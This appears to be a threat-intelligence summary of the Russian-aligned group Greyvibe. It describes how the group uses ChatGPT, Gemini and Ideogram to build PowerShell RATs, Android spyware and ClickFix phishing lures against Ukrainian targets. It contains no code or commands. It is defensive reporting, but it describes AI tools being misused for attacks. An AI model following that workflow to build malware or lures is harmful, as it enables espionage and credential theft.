Greyvibe, a newly identified Russian-aligned hybrid threat actor, utilizes Generative AI tools—including ChatGPT, Google Gemini, and Ideogram AI—to accelerate the cyberattack lifecycle against Ukrainian military, government, and private sector targets. The group employs Large Language Models (LLMs) to automate the creation of custom PowerShell-based Remote Access Trojans (RATs), specifically PhantomRelay and LegionRelay, as well as the Android-based FallSpy spyware. Attackers leverage ClickFix-style phishing via fraudulent CloudFlare CAPTCHA pages and deploy obfuscated scripts, such as LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP, to facilitate credential harvesting, RDP persistence, and the exfiltration of sensitive communications from platforms like Telegram and WhatsApp.
-
Campaign Overview & Strategic Context
- Operates as a hybrid threat, blending state-aligned intelligence objectives with technical TTPs characteristic of the cybercrime ecosystem.
- Primarily targets the Ukrainian military, government agencies (e.g., Kyiv City, State Emergency Service), and private sector entities.
- Active since at least August 2025, focusing on intelligence gathering to support Russian military strategic operations.
-
AI-Augmented Attack Mechanics
- Systematic integration of LLMs for the rapid development of custom malware, backend infrastructure, and automated social engineering.
- Deployment of Ideogram AI to generate highly convincing visual lures and deceptive personas for social engineering.
- Use of AI-generated code patterns to reduce historical backlinking to known threat actors, complicating attribution and detection.
-
Technical Payload & Obfuscation Analysis
- PhantomRelay & LegionRelay: PowerShell-based RATs used for data exfiltration, Remote Desktop Protocol (RDP) setup, and stealing communication data.
- FallSpy: Android-based spyware designed for deep mobile surveillance, targeting contacts, call logs, location, and media files.
- Evasion Scripts: Deployment of LOOKVALPS (PowerShell), LOOKVALJS (JavaScript), DAYLIGHT (PowerShell), and TEASOUP (JavaScript) to bypass security controls.
-
Primary Attack Vectors & Delivery
- Social Engineering: Deployment of fraudulent charity websites for military drone support and deceptive adult club personas.
- Technical Deception: Execution of ClickFix-style attacks utilizing fake CloudFlare CAPTCHA pages to trigger malicious payloads.
- Cloud-Based Distribution: Utilization of legitimate services, including Google Drive and 4sync, to host and deliver malicious archives.
-
Impact and Data Compromise
- Communication Interception: Successful exfiltration of sensitive data and messages from Telegram and WhatsApp.
- Endpoint & Mobile Intelligence: Theft of browser credentials, file enumeration, and comprehensive mobile device metadata.
- Operational Persistence: Establishment of remote access via RDP to maintain long-term presence in compromised environments.
Related posts
- feeds.feedburner.com — MuddyWater Uses DLL Side-Loading in Espionage Campaign Targeting 9 Countries
- Labs
- feeds.feedburner.com — New Russian-Linked GREYVIBE Targets Ukraine with AI-Powered Cyberattacks
- The Register - Security — Russia-linked threat group put ChatGPT to work from lure to payload
- csoonline.com — Russia-aligned crime group Greyvibe extensively uses AI in attacks
- Expertinthecloud
- Hackyourmom
- Cybersecurity News — GREYVIBE Hackers Leverage ChatGPT and Google Gemini to Fuel Cyberattacks
- gbhackers.com — Iran-Linked Hackers Wipe IT and Recovery Systems in Middle East Cyberattack
- Cybersecurity News — Iran-Linked Hackers Destroy IT, Backups, and Recovery Systems in Cyberattack targeting Middle East
- Industrialcyber
- Welivesecurity
- Unit42
- Cyberpress
- Seqrite
- Malware News — 1st June – Threat Intelligence Report
- Cybersecurity News — Threat Actor Uses Stolen Gemini API Keys to Automate Telegram Influence Campaign
- Google Cloud Security Community — Visual Investigations and Campaign Mapping in Google Threat Intelligence Threat Graph